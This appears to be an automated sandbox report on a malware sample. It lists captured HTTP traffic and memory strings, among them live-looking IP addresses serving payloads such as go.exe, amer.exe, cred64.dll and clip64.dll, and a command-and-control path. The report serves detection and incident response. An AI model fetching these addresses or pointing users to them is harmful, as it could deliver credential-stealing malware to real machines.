Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:34:50 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 17 Jan 2024 23:34:59 GMTStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Security-Policy: script-src 'report-sample' 'nonce-G3s4wgR-vzIzvS5NLBiZSQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /v3/signin/_/AccountsSignInUi/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=*Report-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"Server: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Jan 2024 23:34:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateCF-Cache-Status: BYPASSSet-Cookie: XSRF-TOKEN=eyJpdiI6InlqV3dTUVluVE92VzRic0c1TVVsL2c9PSIsInZhbHVlIjoicGNDcXN5cGFiYU1VcE4zLzhIK0JEb2NER3FZNjFnQ3F4VElCbXN1K3prd0ZXeHVEdkxTNDcwaDVIekVsNVpIZXZoLytPVEo1NGxIM2VrWUMxa2p4UTRzbmtlNmFWK0tPUmZ0U0dsWTNKU3hkN2RzV0ZTRGZTbXdBWEk0TEV5SU0iLCJtYWMiOiJjY2M0YjRiMmVmYjFmNDY0OTAzZTI5OWE1NTIxYmEyYWI2ZWEwMWNiZDA2ZWViMzk5NzA2NjkyNDY5OTk5YmQzIn0%3D; expires=Thu, 18-Jan-2024 01:34:59 GMT; Max-Age=7200; path=/; samesite=laxSet-Cookie: tmpfiles_session=eyJpdiI6IkNJSTJNSzJVWUxxMUlIWjRWUC9pNlE9PSIsInZhbHVlIjoiK0gwdXNBNElRVG82T3cvaW5PMy91RjB6OFhXenVVMHl3NmNPSzRnbUIvS0NwdEVMaEtnUDgyTGFrVG5TcGpVQ3doWEFINnZGM0pVbFFxVFRpUEhUc0NoTzNSZk1PYjN0cTRtWm82My80NEJ1YUJpOXhTRGtoRzNUNkVSaTh0aSsiLCJtYWMiOiJkNDkyZDkyY2U5Njg2YWJkYTYwZTA1OGZjNDUzNWRkZjBjZjNjOTVhZDc3OWI4Y2M3NzIyMTEwOWFhZGZlYTZiIn0%3D; expires=Thu, 18-Jan-2024 01:34:59 GMT; Max-Age=7200; path=/; httponly; samesite=laxReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5rMTQ3dFXvSjp3xkupdHYAO9MhXX1KA59PgAIb7zsFthxO8uSuCsR9ysZl4bTmiNzKRWYEZlupaMPfoZPIcarzT6PYWfH96vABzBdwbfo5pRVDHwgemludIS74LGWBU%3D"}],"group":"cf-nel","max_age":604800}
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Wed, 17 Jan 2024 23:34:59 GMTStrict-Transport-Security: max-age=31536000; includeSubDomainsReport-To: {"group":"AccountsSignInUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/AccountsSignInUi"}]}Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factor=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-0ULDSsTcJCS9Dz_sm5jbVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /v3/signin/_/AccountsSignInUi/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /v3/signin/_/AccountsSignInUi/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /v3/signin/_/AccountsSignInUi/cspreportServer: ESFX-XSS-Protection: 0X-Content-Type-Options: nosniffAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Accept-Ranges: noneVary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-EncodingConnection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:02 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:02 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:02 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:02 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:05 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:05 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: X-Datacenter: eastusX-ActivityId: 41867476-0eb3-4129-b158-3b872b3d5390Timing-Allow-Origin: X-Frame-Options: DENYX-ResizerVersion: 1.0Content-Length: 15Cache-Control: public, max-age=5Date: Wed, 17 Jan 2024 23:35:23 GMTConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Content-Type-Options: nosniffAccess-Control-Allow-Origin: *Content-Length: 1245Date: Wed, 17 Jan 2024 23:35:24 GMTConnection: closeAlt-Svc: h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43"
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:44 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:44 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:45 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:45 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:45 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenLast-Modified: Wed, 02 May 2007 10:26:10 GMTContent-Type: text/plainContent-Length: 0Connection: closeAccess-Control-Allow-Origin: https://www.youtube.comAccess-Control-Allow-Credentials: trueTiming-Allow-Origin: https://www.youtube.comAccess-Control-Expose-Headers: Client-Protocol, Content-Length, Content-Type, X-Bandwidth-Est, X-Bandwidth-Est2, X-Bandwidth-Est3, X-Bandwidth-App-Limited, X-Bandwidth-Est-App-Limited, X-Bandwidth-Est-Comp, X-Bandwidth-Avg, X-Head-Time-Millis, X-Head-Time-Sec, X-Head-Seqnum, X-Response-Itag, X-Restrict-Formats-Hint, X-Sequence-Num, X-Segment-Lmt, X-Walltime-MsVary: OriginCross-Origin-Resource-Policy: cross-originX-Content-Type-Options: nosniffDate: Wed, 17 Jan 2024 23:35:45 GMTServer: gvs 1.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Wed, 17 Jan 2024 23:34:53 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Source: RegAsm.exe, 00000002.00000002.2601761581.0000000003E42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://109.107.182.3/
Source: RegAsm.exe, 00000002.00000002.2601761581.0000000003E42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://109.107.182.3/Wiow
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2601761581.0000000003E42000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://109.107.182.3/cost/go.exe
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://109.107.182.3/cost/go.exe4R
Source: firefox.exe, 00000033.00000003.2642629143.0000026F4C7AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:
Source: explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/
Source: RegAsm.exe, 00000002.00000002.2599635058.0000000003D40000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/mine/amer.exe
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/mine/amer.exeW
Source: RegAsm.exe, 00000002.00000002.2599635058.0000000003D40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/mine/amer.exefV
Source: RegAsm.exe, 00000002.00000002.2596470514.000000000157F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/mine/amer.exeshCore
Source: explorhe.exe, 0000002E.00000002.4711406923.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/ngineer
Source: explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/Plugins/clip64.dll
Source: explorhe.exe, 0000002E.00000002.4711406923.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/Plugins/cred64.dll
Source: explorhe.exe, 0000002E.00000002.4711406923.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/Plugins/cred64.dllD
Source: explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.php
Source: explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.php#;
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.php%;
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.php68
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.php7;
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.php?
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpA;?d
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpIU)(A;OICI;FA;;;SY)j-oe
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpU
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpZ
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpZ-
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpc
Source: explorhe.exe, 0000002E.00000002.4711406923.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phph
Source: explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpi
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpj
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpmp
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962135406.00000000014BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpr
Source: explorhe.exe, 0000002E.00000003.3960844324.000000000149A000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000002.4712363155.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpt
Source: explorhe.exe, 0000002E.00000002.4712363155.000000000149A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.68/theme/index.phpy
Source: explorhe.exe, 0000002E.00000002.4711406923.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.33.191.102/autorun.exe
Source: explorhe.exe, 0000002E.00000002.4711406923.00000000013F4000.00000004.00000020.00020000.00000000.sdmp, explorhe.exe, 0000002E.00000003.3962232462.00000000013F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://194.33.191.102/autorun.exev
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: firefox.exe, 00000033.00000003.2675923428.0000026F4C78B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000033.00000003.2821250814.0000026F4CB8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989992367.0000026F4E4F4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2989697113.0000026F4E4F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
